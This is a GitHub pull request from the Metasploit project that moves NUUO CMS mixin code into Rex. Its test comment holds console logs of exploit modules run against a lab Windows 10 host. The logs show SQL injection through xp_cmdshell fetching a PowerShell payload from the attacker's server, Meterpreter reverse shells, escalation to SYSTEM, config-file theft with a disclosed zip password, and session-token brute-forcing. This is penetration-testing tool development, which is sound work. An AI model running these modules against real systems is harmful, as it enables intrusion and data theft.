Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update NUUO mixin, move code to Rex #11765

Merged
merged 16 commits into from Apr 25, 2019

Conversation

@jrobles-r7
Copy link
Contributor

commented Apr 22, 2019

Generalizing NUUO mixin code and moved implementation to Rex. One of the nuuo modules has been updated to work with the new code.

Note: This does break the nuuo modules that have not been updated. I'm working on fixes for those as well.
All the modules have been updated.

Verification

  • rspec spec/lib/rex/proto/nuuo/
  • Verify all green
  • ./msfconsole -q
  • use auxiliary/gather/nuuo_cms_file_download
  • set rhosts <rhost>
  • set NCSBRUTEAPI true
  • run
  • Module runs successfully. Config files downloaded
jrobles-r7 added 8 commits Feb 15, 2019
Parse server responses
aux:nuuo_cms_file_download
jrobles-r7 added 7 commits Apr 22, 2019
Use the updated mixin/rex implementation
Use updated nuuo mixin/rex
Module was updated to use the changes
in the nuuo mixin
@jrobles-r7

This comment has been minimized.

Copy link
Contributor Author

commented Apr 24, 2019

Tested on Windows 10 running NCS Server v2.4.0

msf5 > use exploit/windows/nuuo/nuuo_cms_sqli
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set ncsbruteapi true
ncsbruteapi => true
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Using URL: http://0.0.0.0:8080/EqtOgSEOY
[*] Local IP: http://192.168.171.150:8080/EqtOgSEOY
[*] Server started.
[*] Enabling xp_cmdshell and asking CMS to download and execute http://172.22.222.136:8080/EqtOgSEOY
[*] Injecting PowerShell payload
[+] Sending the payload to CMS...
[*] Executing shell...
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.200:49681) at 2019-04-24 06:58:12 -0500
[+] Deleted c:/windows/temp/jzyjzncewx.ps1
[*] Server stopped.

meterpreter > getuid
Server username: NT Service\MSSQLSERVER
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(windows/nuuo/nuuo_cms_sqli) > 
msf5 > use exploit/windows/nuuo/nuuo_cms_fu
msf5 exploit(windows/nuuo/nuuo_cms_fu) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 exploit(windows/nuuo/nuuo_cms_fu) > set ncsbruteapi true
ncsbruteapi => true
msf5 exploit(windows/nuuo/nuuo_cms_fu) > exploit

[*] Started reverse TCP handler on 172.22.222.136:4444 
[*] Backing up LicenseTool.dll to NoaomDOkOZyn
[*] Uploading payload...
[*] Sleeping 15 seconds...
[*] Sending SENDLICFILE request, shell incoming!
[*] Sending stage (179779 bytes) to 172.22.222.200
[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.200:49682) at 2019-04-24 06:59:25 -0500

meterpreter > 
[!] Please wait a bit while we clean up
[+] Successfully restored LicenseTool.dll!
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
[+] We should have SYSTEM now, enjoy your shell!

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-IPOGIJR
OS              : Windows 10 (Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.22.222.200 - Meterpreter session 2 closed.  Reason: User exit
msf5 exploit(windows/nuuo/nuuo_cms_fu) >
msf5 > use auxiliary/gather/nuuo_cms_file_download
msf5 auxiliary(gather/nuuo_cms_file_download) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 auxiliary(gather/nuuo_cms_file_download) > set ncsbruteapi true
ncsbruteapi => true
msf5 auxiliary(gather/nuuo_cms_file_download) > exploit
[*] Running module against 172.22.222.200

[+] Downloaded file to /home/msfdev/.msf4/loot/20190424065707_default_172.22.222.200_CMServer.cfg_439756.cfg
[+] Downloaded file to /home/msfdev/.msf4/loot/20190424065707_default_172.22.222.200_ServerConfig.cfg_025736.cfg
[*] 

    The user and server configuration files were stored in the loot database.
    The files are ZIP encrypted, and due to the lack of the archive/zip gem,
    they cannot be decrypted in Metasploit.
    You will need to open them up with zip or a similar utility, and use the
    password NUCMS2007! to unzip them.
    Annoy the Metasploit developers until this gets fixed!
    
[*] Auxiliary module execution completed
msf5 auxiliary(gather/nuuo_cms_file_download) >

Tested on Windows 10 running NCS Server v2.1.0

msf5 > use auxiliary/gather/nuuo_cms_bruteforce
msf5 auxiliary(gather/nuuo_cms_bruteforce) > set rhosts 172.22.222.200
rhosts => 172.22.222.200
msf5 auxiliary(gather/nuuo_cms_bruteforce) > exploit
[*] Running module against 172.22.222.200

[*] Bruteforcing session - this might take a while, go get some coffee!
[*] Generating 2621440 session tokens
[+] Found valid user session: 42204032
[*] Time taken: 1414.4688972589793 seconds; total tries 616910
[*] Auxiliary module execution completed
msf5 auxiliary(gather/nuuo_cms_bruteforce) > 
@jrobles-r7 jrobles-r7 marked this pull request as ready for review Apr 24, 2019
lib/msf/core/exploit/nuuo.rb Outdated Show resolved Hide resolved
lib/rex/proto/nuuo/client.rb Outdated Show resolved Hide resolved
Only tcp is supported for the mixin.
@jrobles-r7 jrobles-r7 self-assigned this Apr 25, 2019
@jrobles-r7 jrobles-r7 merged commit f3a820b into rapid7:master Apr 25, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
jrobles-r7 added a commit that referenced this pull request Apr 25, 2019
@jrobles-r7 jrobles-r7 deleted the jrobles-r7:ncs-rex branch Apr 25, 2019
msjenkins-r7 added a commit that referenced this pull request Apr 25, 2019
@jrobles-r7

This comment has been minimized.

Copy link
Contributor Author

commented Apr 25, 2019

Release Notes

This update generalizes the Nuuo mixin and adds code to Rex for handling NCS requests/responses.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
4 participants
You can’t perform that action at this time.